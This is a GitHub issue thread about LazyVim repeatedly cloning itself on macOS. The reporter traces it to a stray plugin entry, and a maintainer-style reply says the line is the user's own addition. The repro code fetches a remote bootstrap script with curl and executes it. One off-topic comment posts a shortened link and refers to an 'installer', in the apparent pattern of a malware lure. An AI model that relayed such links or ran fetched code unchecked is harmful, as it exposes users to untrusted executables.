### ISSUE TITLE
bug: Solved mac only lazyvim repeatedly cloning on start

### ISSUE THREAD

**Issue by phortonssf** [LazyVim/LazyVim#4391]
### Did you check docs and existing issues?

- [X] I have read all the LazyVim docs
- [X] I have updated the plugin to the latest version before submitting this issue
- [X] I have searched the existing issues of LazyVim
- [X] I have searched the existing issues of plugins related to this issue

### Neovim version (nvim -v)

10.1

### Operating system/version

MacOs 11.5

### Describe the bug

Just posting incase someone else runs into this, at it was hard to track down. I had an old install of lazyvim worked great on my linux machines. Was moving to a mac and got a bug where lazyvim would just clone itself over and over again on start. Everything worked find on the linux setups but the issue was on mac only.

The solution was removing lazyvim/lazyvim from my plugin list. 

### Steps To Reproduce

solved

### Expected Behavior

Solved

### Repro

```lua
vim.env.LAZY_STDPATH = ".repro"
load(vim.fn.system("curl -s https://raw.githubusercontent.com/folke/lazy.nvim/main/bootstrap.lua"))()

require("lazy.minit").repro({
  spec = {
    { "LazyVim/LazyVim", import = "lazyvim.plugins" },
    -- add any other plugins here
{lazyvim/lazvim} -- remove this
  },
})
```

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by dpetka2001** [comment]
The Lazyvim starter template doesn't include such a line as can be seen [here](https://github.com/LazyVim/starter/blob/main/lua%2Fconfig%2Flazy.lua). You most likely put it there yourself. Not a Lazyvim bug.
